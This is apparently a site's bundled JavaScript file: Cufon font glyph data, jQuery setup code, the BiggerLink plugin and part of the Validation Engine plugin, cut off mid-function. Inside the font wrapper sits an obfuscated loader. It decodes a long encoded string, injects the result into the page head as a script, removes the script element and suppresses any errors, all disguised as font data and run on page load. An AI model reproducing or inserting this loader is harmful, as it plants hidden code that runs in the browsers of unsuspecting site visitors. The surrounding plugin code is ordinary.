v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm157,-347r57,0r-65,69r-34,0","w":280},{"d":"67,75v-66,-87,-68,-260,0,-345r61,0v-39,44,-62,94,-62,171v0,81,21,123,62,174r-61,0","w":136},{"d":"7,-202v0,-61,88,-88,115,-34r-30,16v-15,-25,-52,-10,-49,19v-4,30,36,41,49,16r29,19v-30,49,-114,24,-114,-36xm89,7r111,-272r30,0r-110,272r-31,0xm196,-60v0,-33,25,-63,56,-63v32,0,58,30,58,63v0,33,-25,63,-58,63v-32,0,-56,-30,-56,-63xm253,-29v28,0,28,-62,0,-62v-28,1,-29,63,0,62","w":317},{"d":"109,5v-64,-2,-91,-33,-90,-102r0,-94r48,0v5,58,-21,151,42,151v30,0,45,-17,45,-52v0,-28,-16,-50,-48,-65r26,-40v46,25,69,60,69,105v0,56,-34,98,-92,97xm44,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm122,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25"},{"d":"114,-152v-61,0,-37,91,-42,152r-48,0r0,-215r-27,0r0,-31r27,0r0,-19r48,0r0,19r61,0r0,31r-61,0r0,43v43,-45,126,-24,122,46v-5,88,30,235,-86,194r0,-38v22,11,43,4,39,-26v-7,-56,22,-156,-33,-156"},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259","w":223},{"d":"48,-212v25,5,37,-26,14,-26v-8,0,-14,5,-18,13r-32,0v1,-52,92,-52,96,-5v0,11,-6,20,-17,26v50,22,17,78,-32,78v-29,0,-53,-18,-53,-46r33,0v0,25,44,24,44,3v0,-12,-12,-17,-35,-18r0,-25xm86,7r110,-272r30,0r-110,272r-30,0xm250,-136r32,0r0,85r14,0r0,25r-14,0r0,26r-29,0r0,-26r-70,0r0,-26xm253,-51r0,-47r-39,47r39,0","w":302},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm108,-295r57,0r-65,69r-34,0xm186,-295r57,0r-64,69r-35,0","w":230},{"d":"25,-191r48,0r0,79r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-191","w":208},{"d":"176,-53v1,68,-85,51,-152,53r0,-191v62,1,143,-11,142,48v0,19,-9,33,-28,41v25,9,38,25,38,49xm115,-135v1,-22,-19,-25,-43,-23r0,42v21,1,43,-1,43,-19xm122,-56v1,-23,-23,-27,-50,-25r0,44v23,1,49,0,50,-19","w":192},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58xm7,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":158},{"d":"25,-251v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":100},{"d":"30,-262r48,0r0,71r28,0r0,41r-28,0r0,150r-48,0r0,-150r-25,0r0,-41r25,0r0,-71xm38,21r32,0v-1,30,-1,41,-18,54r-9,-9v6,-4,9,-10,11,-16r-16,0r0,-29","w":107},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26xm119,-347r57,0r-65,69r-34,0","w":208},{"d":"0,17v1,-25,28,-14,37,-6v5,0,6,-5,6,-10r-8,-168v5,-51,-12,-153,41,-160v12,-1,22,8,22,18v1,11,-6,19,-16,19v-7,0,-27,-22,-27,1v4,99,12,120,5,242v-3,52,-3,81,-39,86v-12,2,-21,-10,-21,-22","w":98},{"d":"59,-259r74,0r0,259r-49,0r0,-212r-53,0","w":201},{"d":"187,-184v-1,38,-20,58,-50,69r62,115r-54,0r-58,-110r-5,0r0,110r-49,0r0,-259v83,-3,155,-1,154,75xm139,-184v-1,-27,-25,-27,-57,-26r0,52v30,0,58,2,57,-26xm32,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":208}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-632-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("DAop1}uQ`8SWDrzJ+}E0gAgSyZupo}SWyZ50`8w_o43(:9Qsy7bdu#bpy7bdu#wNy7bdu#)0y7bd&ZKqy7bdu#g$y7bd&ZKZy7bd&Zuly7bd&A4s2zqp&#&$:4qp&#5Nupqp&#)duzqp&#5^oEqp&#K0:zqp&#)9uEqp&#6zo4qp&#uN&4qp&#6lu4qp&#)dozqp&Nbp&pqp&#6N;4qp&#6^:4qp&#ul&pqp&#)p;4qp&#5N;4qp&#6Nupqp&#)9o4qp&#6l:zqpoNhdu4qp&N4N:[62+Lgp&Lw2+Lhqu#E2+Lh9:NE2+Lhd:L62+LhQ&L62+LhdoAw2+Lhq&#u2+Lhq&N42+LhquZw2+Lh9;A42+Lh9;8u2+Lgd&8w2+Lhq&8w2+LhquZ52+Lh9:Nw2+Lh9:9o2+Lhq&9E2+Lh9:9l2+Lh9:}52+LhQ&Lo2+Lhdo}E2+LhQ&Lw2+Lh9;Ll2+Lgp:}Kpy7bdu#KXy7bd&A5^y7bdu#b9y7bd&LbZy7b0&NKpy7b0uN:9y7b0uLgQy7bd&A&py7b0uNoly7bd&9+zy7bd&Zu^y7bdu#gZy7b0&NEzy7bdu#wzy7bd&AKQy7bdu#ENy7bdu#&d&zqp&#6s:pqp&#5^;Eqp&NbX;Eqp&#K9:pqp&NgZu4qp&#&X:4qp&#ulo4qp&8bX&4qp&#KQupqp&#&$uzqp&#)d&pqp&#Kq&pqp&#6^:zqp&#6};Eqp&#)du4qp&#6l&4qp&#)Quzqp&#)d:zqp&#uNupqp&#K0o4qp&#uN&Eqp&#KQ:pqp&84}&zqp&#uso4qp&#&$&zqp&#KQo4qp&#)duEqpoNKduzqp&#K0:pqp&#)d&^62+Lgqu8u2+LhQ&Nu2+LgpuNzgy7bd&L2dy7bqoL{0y7b0uL4}y7bd&ZK$y7bdu#gXy7b0&#uzy7bd&Z5l;pqp&#)9;4qp&#)Q;4qp&#)0oEqp&Nh9&pqp&#)p:4qp&#KZ&zqp&#Kp;4qp&N4Nozqp&#K0;Eqp&#Kd;4qp&#ul:0q2+Lhqu}42+Lgd&Lu2+LhquZE2+8:d&#u2+Lhd:Ll2+Lhqo}o2+LhQ&9l2+Lgp:8E2+Lhq&}E2+Lhdo}w2+LhQ&N42+Lhqu952+Lgq;Lwby7b0&NE}y7b0uLbXy7bqoL{Qy7bdu#K9y74}&LhQy7bd&Zg=y7bd&9^=y7bd&ZK=y7b0&#Kpy7bd&Lo^y7bd&Lg=y7bdu#6Ny7b0u8usy7bd&Lbdy7bd&9^dy7bd&L)Z14qp&#KQozqp&#&$&pqp&Nbp:4qp&#ulu4qp&#KQ&pqp&#)Q:4qp&#uluEqp&#6^&zqp&#ul:4qp&#6zozqp&#K=uEqp&Ngq&zqp&Nh9:pqp&#uN&zqp&#KZu4qp&#)d&4l2+Lh9:}w2+Lh9;#z8y7bdu#bQy7bd&L)Qy7bdu#hXy7bdu#5ly7b0&9KdLEqp&#6}&zqp&N:Q&zqp&Nbpo4qp&Nbp;4qp&NbpuEqp&#Kd&Eqp&#6l&pqp&N4NuEqp&#)Qu4qp&#6zoEqp&#K=ozqp&NbZ&zqp&#)$&4qp&NbXuEqp&NbZuLq2+Lgpo#l2+LgpuNu2+Lhqu9u2+8:q&#u2+Lgp&9w2+Lh9;#42+LhdoNE2+LgpuL+2+LgZ&Zu2+Lgp&Zu2+Lhq&9o2+Lhqu9+2+Lhqo})Yy7bd&AE^y7b0uL:Qy7bdu#Ezy7b0&L4^y7b0uL^dy7bd&Lwly7b0uL^q:pqp&#K9:4qp&N4l&4qp&#Kq;Eqp&#6s&zqp&N:Z:zqp&NbZ&4qp&#6NuEqp&#)d;4qp&#KQ;4qp&#Kp&zqp&N4l:pqp&NgQ;Eqp&#&X;Kp2+Lgq&No2+Lhq&Lzyy7b0uLhdy7bd&LE}y7bdu#Kqy7bd&Lgdy7bd&Lg$y7bd&L4supqp&#Kd;Eqp&#KquEqp&NbZuzqp&#)0:pqp&#)Q;Eqp&Nb$&pqp&#usu4qp&N:ZubS2+LhQu#+2+Lhq&N&Uy7bd&Z&$54qp&#K9u[$2+Lgp:}u2+LhQ&ZE2+LhdoNz2+Lg0&#52+LgpuLE2+LhQ&942+Lhdo}u2+Lgq;LE2+Lhq&L+2+Lg0uN62+LhQ&Zu2+Lh9:852+Lhqu}52+LhdoLw2+Lgpo#z2+LhQ&}5Sy7bd&ZE^y7bd&A:py7bdu#5zy7bd&Z5Ny7bdu#w}y7bd&AgZy7bdu#wsCzqp&#)9upqp&#6}&pqp&N4l&Eqp&NbpoEqp&#K9o8+2+Lhd:Nw2+8:d&#o2+LhQ;L62+Lhd:96%y7b0uLbdy7bdu#bqy7bd&9{Qy7bdu#gqyrS2+LhQu8o2+LhQu#E2+Lgp;Au7bpqp&#)p:zqp&#&Xu}o2+Lgp&Ll2+Lhd:Nz2+LhQ&AECy7b0uLoly7b0&AK9y7b0uL5Ny7b0&9h0y7b0uN:Zy7bd&ZKdy7b0&9gdy7bdu#Kpy7bd&Agdy7bdu#u^y7bd&ZgZy7bdu#w^y7bd&Lhpy7bdu#bXy7bd&Lwsy7bdu#5}y7bdu#4N)zqp&Nbp:zqp&#6l&zqp&NbZ:pqp&#Kp:pqpoNKdupqp&#6^u4qp&NgZ&4qp&#)Q&Eqp&Nh0&zqp&#6zuzqp&#Kp:4qp&Nbp:Qj2+Lgd&Ll2+Lhd:NE2+LhQu#w2+Lhd:LzYy7bqoL{py7bd&Aw}b4qpoNhd&Eqp&N6l:pqp&#)9&4qp&#uNoLlq+pqp&#6z&pqp&#Kdu=u2+LhQ&Nw2+Lhd:}E2+Lh9:9w2+LhQ&8w2+Lhqu942+Lhq&Zw2+Lh9:}o2+Lgd&852+Lgd&N62+Lhq;L52+Lhdo8u2+Lg0&Ao.y7bd&Lb9oEqp&#6^;LY2+LhQ&N+2+Lhdo#o2+Lhd:9u2+LhdoLl2+LhQ&#+2+Lhd:ZE2+LgpuN+2+Lhq&9z2+LhQ&L52+Lh9;8o2+Lhq&LE)y7b0&L5zy7bd&A:=y7bd&Ab0y7b0&#uly7bdu#4z84qp&NgdusQ9y7b0&N:Qy7b0&#EN:Edsy7bd&}wly7bd&Ab=wEqp&#)q:zqp&#6^;#S+y7b0uL^0y7bd&AEzuEqp&#6^&9p2+Lgq&N52+Lgq&Lu2+Lgq&Lo2+Lhd:Zu2+Lhq&Z5Dy7b0&NKqy7bd&ZgX)Lz2+Lhq&Nw2+Lhdo}o2+Lhd:9l2+LhquNl2+Lhq&Lopy74}&Lhd+Eqp&#6^uE52+LhdoA42+Lhdo8E2+Lg9&NE2+LgZu#hZ1Eqp&Nh9&AE2+LhquAw2+Lgp&Au2+8os&#EZD0u2+Lgq;L52+Lgd&Lw2+Lgd&Lz2+Lhd:Zo2+Lh9:Ll2+LgduZo2+Lh9:942+Lgq;L4sy7b0&#Ezy7bd&A&qy7b0uLENy7bd&Lo}y7bd&Zg0y7bd&AbqPzqp&#6zu4qp&#K9&pqp&#)9ozqpo}gd&}$2+LgpuLo2+LgZuN62+LhquNz2+LEz;#u$y7bd&AE}y7b0&8KXy7b0uLh0PE(d`pY2+LhQu#uE5zqp&NKp:zqp&#K9upqp&#6su4qp&NbZ&Ko2+Lhq&952+LhQuL+2+Lgp:N5Jy7bd&L:Zo4qp&#KZuEqp&#K0uzqp&#6}o4qp&Nbp&zqp&#K=;Eqp&#6}:zqp&#us&Eqp&N:9:zqp&#Kqo4qp&#6z;4qp&#6}&K$2+Lh9;#+2+Lgp:852+Lhq&}oPy7bd&LEs2Eqp&84}&pqp&#KZ&Eqp&#)qupqp&#E}:4qp&#us&pqp&#&$u4qp&#&X:0+2yrw2+Lhqu8w2+Lh9;Lz2+Lh9;8w2+LhquZ42+Lhq&#w2+Lhq&#52+Lh9;842+Lhq&AE2+Lhqu#42+Lgq;L&fy7b0&NK$y7bd&L6z)pqp&#Kpu4qp&#&Xozqp&#Kdozqp&#us;4qp&#Kq:4qp&#6Nuzqp&NKpo4qp&#6No4qp&#)do442+Lhq&}h6r#KEA7g5DH&u;T)w[Lb48y:o`12+CP{lsN^z}_%Yf@(jW.dq09QpZ=X$BJ3SU]w2+Lhq&L52+Lhd:Z52+Lh0:9o2+Lh9;852+Lhqu}u2+Lhq&NE2+Lhq&9w2+8:q&#l2+LhquL+2+Lhq&8u2+Lhd:8E5y7bd&Lu}y7bd&L2Zy7bd&AgXy7bd&}wsy74}&Lh0y7b0uLbpy7bdu#E}y74}&#hQy7bd&Lg0y7bdu#&Zy7bd&AKZy7bd&A)dy7b0&Ng$y7bd&8ozy7bd&ZuN`zqp&#K=:pqp&N6luEqp&#Kd:zqp&#)9:zqp&#)0&Eqp&NhQuEqp&#KdoEqp&#ulozqp&#6^u0E2+Lhd:Zw2+Lg0&8E2+Lh9:9u2+Lgp&L62+Lhqu#6Xy7b0uLosy7b0&#&0y7bd&L)0y74}&#h0y74}&#hqy7bd&A5sy7b0&#&$y74}&Lhpy7bqoL{dy7bd&}wNy7bdu#g0y7b0&#gqy7bdu#&9y7bdu#K$y7b0u8bZy7bd&L2qy7b0&#Ely7bd&L4zy7b0&#K=y7bdu#bZy7bd&A&0y7b0&#gZy7bd&AENy7bd&8osy7b0&L^dy7bd&L2$y7bd&Loly74}&Lhqy7b0&AK=y7bd&LKdy7bd&A:Zy7bd&Ag9y7bd&L&dy7bd&AwNy7bd&8oNy7b0uNuly7bd&L)Xy7bd&LKpy7bd&A5}y7b0uL:Xy7b0uL{dy7bd&9^qy7bd&Lhqy7bd&Ag=y7bd&Abdy7bd&L6Ny7bd&AK=y7bd&L4}y7bd&A:Qy7bd&L:=y7bd&9^Qy7bd&A)qy7bd&LhZDEqp&NKdu4qp&#uN:zqp&#)p&zqp&#)q:4qp&#6so4qp&#Kp&4qp&#K9;Eqp&#)9&zqp&#KZ&4qp&#5^;4qp&#KZ&pqp&#KpuEqp&Ng0:NE2+LhquL{sH_ud1AzQDrgsD[qYTLh(2#psH_h(1#pdH}qz1}+Q`rq_T8gWos$_17zd`7&SC=QJ`8:%:s$.`9Q.ys{];_+=+pdWDL3%T9Yf+8wY+Al2H}$Y2}52H}$z+7qf+8wY+AlW`8Y(:8$^yr$N1ZQY5rSYH_wz2=)%1ASN:ywY1ZXW`AS9+A$l18bYD8o.2s{J`Lq(;0(@`[z_8Zu1`4p+Ty61`4pSD[{Y")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":216,"face":{"font-family":"century gothic","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-41 -404 454 110","underline-thickness":"32.3438","underline-position":"-16.875","unicode-range":"U+0020-U+F108"}}));

var str = "";

$(document).ready(function(){

	jQuery(".validate").validationEngine();
	
	$("a#wp").attr('href', '/wp-admin');
	
	/* ----------------------------------------------------------------- */
	/* -- target="_blank" fix, geef externe links een rel="external"  -- */
	$("a").each( function() {
		
		if ( $(this).attr('rel') && $(this).attr('rel').indexOf("external") >= 0 )
		{
			$(this).attr('target', '_blank');
		}
	
	});
	/* ----------------------------------------------------------------- */
	
	
});


Cufon.replace("h1, h2, h3, h4, h5, h6");
Cufon.replace("h1 a, h2 a, h3 a, h4 a, h5 a, h6 a",{
	hover: true
});

Cufon.replace(".cufon",{
	hover: true
});

Cufon.replace(".listenBox label",{
	hover: true
});

Cufon.replace(".menu ul li a",{
	hover: true
});

/*
 * jQuery.BiggerLink v2.0.1
 * http://www.ollicle.com/eg/jquery/biggerlink/
 *
 * Copyright (c) 2009 Oliver Boermans
 * http://creativecommons.org/licenses/MIT/
 *
 * 2009-11-22 (22 Nov 2009)
*/ 
(function($) {
	$.fn.biggerlink = function(options) {

		// Default settings
		var settings = {
			biggerclass:'bl-bigger', 	// class added to the first contained link and others that trigger it
			hoverclass:'bl-hover', 		// class added to parent element on hover/focus
			hoverclass2:'bl-hover2', 	// class added to parent element on hover/focus of other links
			clickableclass:'bl-hot', 	// class added to parent element with behaviour
			otherstriggermaster: true,	// will all links in containing biggerlink element trigger the first link
			follow: 'auto'				// follow master link on click? : 'auto',true,false
		};
		if(options) {
			$.extend(settings, options);
		}
		$(this).filter(function(){
			 return $('a',this).length > 0;

		}).addClass(settings.clickableclass).css('cursor', 'pointer').each(function(i){
			
			// store element references
			var big = $(this).data('biggerlink',{hovered:false,focused:false,hovered2:false,focused2:false});
			var links = {
				all: $('a',this),
				big: $(this),
				master: $('a:first',this).data('biggerlink',{status:'master'}).addClass(settings.biggerclass),
				other: $('a',this).not($('a:first',this)).data('biggerlink',{status:'other'})
			};
			
			
			$('a',this).andSelf().each(function(){
				var newdata = $.extend($(this).data('biggerlink'),links);
				$(this).data('biggerlink',newdata);
			});
			
			
			
			// Add title of first link with title to parent if not already set
			var thistitle = big.attr('title');
			var newtitle = big.data('biggerlink').master.attr('title');
			if(newtitle && !thistitle)
			{
				big.attr('title', newtitle);
			}
			


		// events on biggerlink element
		
		big
			.mouseover(function(event){
				window.status = $(this).data('biggerlink').master.get(0).href;
				$(this).addClass(settings.hoverclass);
				$(this).data('biggerlink').hovered = true;
			})
			.mouseout(function(event){
				window.status = '';
				if(!$(this).data('biggerlink').focused)
				{
					$(this).removeClass(settings.hoverclass);
				}
				$(this).data('biggerlink').hovered = false;
			})
			.bind('click',function(event){

				// if clicked direct or non-link
				if(!$(event.target).closest('a').length)
				{
					$(this).data('biggerlink').master.trigger({type:'click',source:'biggerlink'});
					event.stopPropagation();
				}
			});
			
			
			
			// focus/blur
			
			links.all
			.bind('focus',function(){
				$(this).data('biggerlink').big.addClass(settings.hoverclass);
				$(this).data('biggerlink').big.data('biggerlink').focused = true;
			}).bind('blur',function(){
				if(!$(this).data('biggerlink').big.data('biggerlink').hovered)
				{
					$(this).data('biggerlink').big.removeClass(settings.hoverclass);
				}
				$(this).data('biggerlink').big.data('biggerlink').focused = false;
			});
			
		
			
			// click/focus/blur event on master (first) link within biggerlink
		
			links.master
			.bind('click',function(event){
				if(event.source == 'biggerlink')
				{
					if(settings.follow === true || settings.follow == 'auto' && event.result !== false)
					{
						window.location = $(this).attr('href');
					}
					else
					{
						event.stopPropagation();
					}
				}
			});
			
			
			// links other than the first (master) link also within biggerlink
			
			// other links are independent
			if(settings.otherstriggermaster)
			{
				links.other.addClass(settings.biggerclass)
				.bind('click',function(event){
					// trigger click events on master link instead
					$(this).data('biggerlink').master.trigger({type:'click',source:'biggerlink'});
					
					// stop this link being followed
					event.preventDefault();
					
					// prevent events on parent elements being triggered
					event.stopPropagation();
				});
			}
			
			// other links are slaves of master link 
			else
			{
				links.other
				.bind('focus',function(){
					$(this).data('biggerlink').big.addClass(settings.hoverclass2);
					$(this).data('biggerlink').big.data('biggerlink').focused2 = true;
				})
				.bind('blur',function(){
					if(!$(this).data('biggerlink').big.data('biggerlink').hovered2)
					{
						$(this).data('biggerlink').big.removeClass(settings.hoverclass2);
					}
					$(this).data('biggerlink').big.data('biggerlink').focused2 = false;
					
				})
				.bind('mouseover',function(event){
					$(this).data('biggerlink').big.addClass(settings.hoverclass2);
					$(this).data('biggerlink').big.data('biggerlink').hovered2 = true;
					event.stopPropagation();
				})
				.bind('mouseout',function(event){
					if(!$(this).data('biggerlink').big.data('biggerlink').focused2)
					{
						$(this).data('biggerlink').big.removeClass(settings.hoverclass2);
					}
					$(this).data('biggerlink').big.data('biggerlink').hovered2 = false;
					event.stopPropagation();
				});
				
				if(!links.other.attr('title'))
				{
					links.other.attr('title','');
				}
			}
		});
		return this;
	};
})(jQuery);



/*
 * Inline Form Validation Engine 2.2, jQuery plugin
 *
 * Copyright(c) 2010, Cedric Dugas
 * http://www.position-absolute.com
 *
 * 2.0 Rewrite by Olivier Refalo
 * http://www.crionics.com
 *
 * Form validation engine allowing custom regex rules to be added.
 * Licensed under the MIT License
 */
(function($) {

    var methods = {

        /**
         * Kind of the constructor, called before any action
         * @param {Map} user options
         */
        init: function(options) {
            var form = this;
            if (!form.data('jqv') || form.data('jqv') == null ) {
                methods._saveOptions(form, options);

                // bind all formError elements to close on click
                $(".formError").live("click", function() {
                    $(this).fadeOut(150, function() {

                        // remove prompt once invisible
                        $(this).remove();
                    });
                });
            }
        },
        /**
         * Attachs jQuery.validationEngine to form.submit and field.blur events
         * Takes an optional params: a list of options
         * ie. jQuery("#formID1").validationEngine('attach', {promptPosition : "centerRight"});
         */
        attach: function(userOptions) {
            var form = this;
            var options;

            if(userOptions)
                options = methods._saveOptions(form, userOptions);
            else
                options = form.data('jqv');
			
			var validateAttribute = (form.find("[data-validation-engine*=validate]")) ? "data-validation-engine" : "class";
			
            if (!options.binded) {
					if (options.bindMethod == "bind"){
						
						// bind fields
                        form.find("[class*=validate]:not([type=checkbox])").bind(options.validationEventTrigger, methods._onFieldEvent);
                        form.find("[class*=validate][type=checkbox]").bind("click", methods._onFieldEvent);

                        // bind form.submit
                        form.bind("submit", methods._onSubmitEvent);
					} else if (options.bindMethod == "live") {
                        // bind fields with LIVE (for persistant state)
                        form.find("[class*=validate]:not([type=checkbox])").live(options.validationEventTrigger, methods._onFieldEvent);
                        form.find("[class*=validate][type=checkbox]").live("click", methods._onFieldEvent);

                        // bind form.submit
                        form.live("submit", methods._onSubmitEvent);
					}

                options.binded = true;
            }

        },
        /**
         * Unregisters any bindings that may point to jQuery.validaitonEngine
         */
        detach: function() {
            var form = this;
            var options = form.data('jqv');
            if (options.binded) {

                // unbind fields
                form.find("[class*=validate]").not("[type=checkbox]").unbind(options.validationEventTrigger, methods._onFieldEvent);
                form.find("[class*=validate][type=checkbox]").unbind("click", methods._onFieldEvent);
                // unbind form.submit
                form.unbind("submit", methods.onAjaxFormComplete);
                
               
                // unbind live fields (kill)
                form.find("[class*=validate]").not("[type=checkbox]").die(options.validationEventTrigger, methods._onFieldEvent);
                form.find("[class*=validate][type=checkbox]").die("click", methods._onFieldEvent);
                // unbind form.submit
                form.die("submit", methods.onAjaxFormComplete);
                
                form.removeData('jqv');
            }
        },
        /**
         * Validates the form fields, shows prompts accordingly.
         * Note: There is no ajax form validation with this method, only field ajax validation are evaluated
         *
         * @return true if the form validates, false if it fails
         */
        validate: function() {
            return methods._validateFields(this);
        },
        /**
         * Validates one field, shows prompt accordingly.
         * Note: There is no ajax form validation with this method, only field ajax validation are evaluated
         *
         * @return true if the form validates, false if it fails
         */
        validateField: function(el) {
            var options = $(this).data('jqv');
            return methods._validateField($(el), options);
        },
        /**
         * Validates the form fields, shows prompts accordingly.
         * Note: this methods performs fields and form ajax validations(if setup)
         *
         * @return true if the form validates, false if it fails, undefined if ajax is used for form validation
         */
        validateform: function() {
            return methods._onSubmitEvent.call(this);
        },
        /**
         * Displays a prompt on a element.
         * Note that the element needs an id!
         *
         * @param {String} promptText html text to display type
         * @param {String} type the type of bubble: 'pass' (green), 'load' (black) anything else (red)
         * @param {String} possible values topLeft, topRight, bottomLeft, centerRight, bottomRight
         */
        showPrompt: function(promptText, type, promptPosition, showArrow) {

            var form = this.closest('form');
            var options = form.data('jqv');
            // No option, take default one
			if(!options) options = methods._saveOptions(this, options);
            if(promptPosition)
                options.promptPosition=promptPosition;
            options.showArrow = showArrow==true;

            methods._showPrompt(this, promptText, type, false, options);
        },
        /**
         * Closes all error prompts on the page
         */
        hidePrompt: function() {
        	var promptClass =  "."+ methods._getClassName($(this).attr("id")) + "formError";
            $(promptClass).fadeTo("fast", 0.3, function() {
                $(this).remove();
            });
        },
        /**
         * Closes form error prompts, CAN be invidual
         */
        hide: function() {
			var closingtag;
        	if($(this).is("form")){
        		closingtag = "parentForm"+$(this).attr('id');
        	}else{
        		closingtag = $(this).attr('id') +"formError";
        	}
            $('.'+closingtag).fadeTo("fast", 0.3, function() {
                $(this).remove();
            });
        },
        /**
         * Closes all error prompts on the page
         */
        hideAll: function() {
            $('.formError').fadeTo("fast", 0.3, function() {
                $(this).remove();
            });
        },
        /**
         * Typically called when user exists a field using tab or a mouse click, triggers a field
         * validation
         */
        _onFieldEvent: function() {
            var field = $(this);
            var form = field.closest('form');
            var options = form.data('jqv');
            // validate the current field
            methods._validateField(field, options);
        },
        /**
         * Called when the form is submited, shows prompts accordingly
         *
         * @param {jqObject}
         *            form
         * @return false if form submission needs to be cancelled
         */
        _onSubmitEvent: function() {
            var form = $(this);
 			var options = form.data('jqv');
   
			// validate each field (- skip field ajax validation, no necessary since we will perform an ajax form validation)
            var r=methods._validateFields(form, true);
		
            if (r && options.ajaxFormValidation) {
                methods._validateFormWithAjax(form, options);
                return false;
            }

            if(options.onValidationComplete) {
                options.onValidationComplete(form, r);
                return false;
            }
            return r;
        },

        /**
         * Return true if the ajax field validations passed so far
         * @param {Object} options
         * @return true, is all ajax validation passed so far (remember ajax is async)
         */
        _checkAjaxStatus: function(options) {
            var status = true;
            $.each(options.ajaxValidCache, function(key, value) {
                if (!value) {
                    status = false;
                    // break the each
                    return false;
                }
            });
            return status;
        },
        /**
         * Validates form fields, shows prompts accordingly
         *
         * @param {jqObject}
         *            form
         * @param {skipAjaxFieldValidation}
         *            boolean - when set to true, ajax field validation is skipped, typically used when the submit button is clicked
         *
         * @return true if form is valid, false if not, undefined if ajax form validation is done
         */
        _validateFields: function(form, skipAjaxValidation) {
            var options = form.data('jqv');

            // this variable is set to true if an error is found
            var errorFound = false;
			
			// Trigger hook, start validation
			form.trigger("jqv.form.validating");
            // first, evaluate status of non ajax fields
            form.find('[class*=validate]').not(':hidden').each( function() {
                var field = $(this);
                errorFound |= methods._validateField(field, options, skipAjaxValidation);
            });
            // second, check to see if all ajax calls completed ok
            // errorFound |= !methods._checkAjaxStatus(options);
			
            // thrird, check status and scroll the container accordingly
			form.trigger("jqv.form.result", [errorFound]);
			
            if (errorFound) {
				
                if (options.scroll) {

                    // get the position of the first error, there should be at least one, no need to check this
                    //var destination = form.find(".formError:not('.greenPopup'):first").offset().top;

                    // look for the visually top prompt
                    var destination = Number.MAX_VALUE;
                    var fixleft = 0;
                    var lst = $(".formError:not('.greenPopup')");

                    for (var i = 0; i < lst.length; i++) {
                        var d = $(lst[i]).offset().top;
                        if (d < destination){
                            destination = d;
                            fixleft = $(lst[i]).offset().left;
                        }
                    }

                    if (!options.isOverflown)
                        $("html:not(:animated),body:not(:animated)").animate({
                            scrollTop: destination,
                            scrollLeft: fixleft
                        }, 1100);
                    else {
                        var overflowDIV = $(options.overflownDIV);
                        var scrollContainerScroll = overflowDIV.scrollTop();
                        var scrollContainerPos = -parseInt(overflowDIV.offset().top);

                        destination += scrollContainerScroll + scrollContainerPos - 5;
                        var scrollContainer = $(options.overflownDIV + ":not(:animated)");

                        scrollContainer.animate({
                            scrollTop: destination
                        }, 1100);

                        $("html:not(:animated),body:not(:animated)").animate({
                            scrollTop: overflowDIV.offset().top,
                            scrollLeft: fixleft
                        }, 1100);
                    }
                }
                return false;
            }
            return true;
        },
        /**
         * This method is called to perform an ajax form validation.
         * During this process all the (field, value) pairs are sent to the server which returns a list of invalid fields or true
         *
         * @param {jqObject} form
         * @param {Map} options
         */
        _validateFormWithAjax: function(form, options) {

            var data = form.serialize();
			var url = (options.ajaxFormValidationURL) ? options.ajaxFormValidationURL : form.attr("action");
            $.ajax({
                type: "GET",
                url: url,
                cache: false,
                dataType: "json",
                data: data,
                form: form,
                methods: methods,
                options: options,
                beforeSend: function() {
                    return options.onBeforeAjaxFormValidation(form, options);
                },
                error: function(data, transport) {
                    methods._ajaxError(data, transport);
                },
                success: function(json) {

                    if (json !== true) {

                        // getting to this case doesn't necessary means that the form is invalid
                        // the server may return green or closing prompt actions
                        // this flag helps figuring it out
                        var errorInForm=false;
                        for (var i = 0; i < json.length; i++) {
                            var value = json[i];
						
                            var errorFieldId = value[0];
                            var errorField = $($("#" + errorFieldId)[0]);
							
                            // make sure we found the element
                            if (errorField.length == 1) {
								
                                // promptText or selector
                                var msg = value[2];
								// if the field is valid
                                if (value[1] == true) {

                                    if (msg == ""  || !msg){
                                        // if for some reason, status==true and error="", just close the prompt
                                        methods._closePrompt(errorField);
                                    } else {
                                        // the field is valid, but we are displaying a green prompt
                                        if (options.allrules[msg]) {
                                            var txt = options.allrules[msg].alertTextOk;
                                            if (txt)
                                                msg = txt;
                                        }
                                        methods._showPrompt(errorField, msg, "pass", false, options, true);
                                    }

                                } else {
                                    // the field is invalid, show the red error prompt
                                    errorInForm|=true;
                                    if (options.allrules[msg]) {
                                        var txt = options.allrules[msg].alertText;
                                        if (txt)
                                            msg = txt;
                                    }
                                    methods._showPrompt(errorField, msg, "", false, options, true);
                                }
                            }
                        }
